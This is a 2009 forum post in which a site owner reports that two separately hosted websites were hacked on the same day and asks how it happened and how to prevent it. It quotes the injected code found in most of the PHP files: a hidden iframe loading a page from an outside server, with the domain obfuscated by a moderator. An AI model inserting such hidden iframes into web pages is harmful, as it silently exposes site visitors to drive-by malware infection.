2 of my websites were hacked on the same day, one is hosted by a very large hosting company and the other is my own server.
If it was just my server that got hacked I would have thought that I havent made my server secure enough.
On my own server I have root access, on the other server its just ftp access, passwords are different, one is Plesk the other is CPanel.
Most of the index.php and other php scripts were modified to include the following
<iframe src="http://example.ru:8080/index.php" width=189 height=120 style="visibility: hidden"></iframe>
I was first made aware when I got an email from Google advising me of the problem - "We recently discovered that some of your pages can cause users to be infected with malicious software."
The question is how did they hack me, when can I do to prevent it?
Thank you for your help
[edited by: encyclo at 11:40 am (utc) on July 11, 2009]
[edit reason] obfuscated link to hacker website [/edit]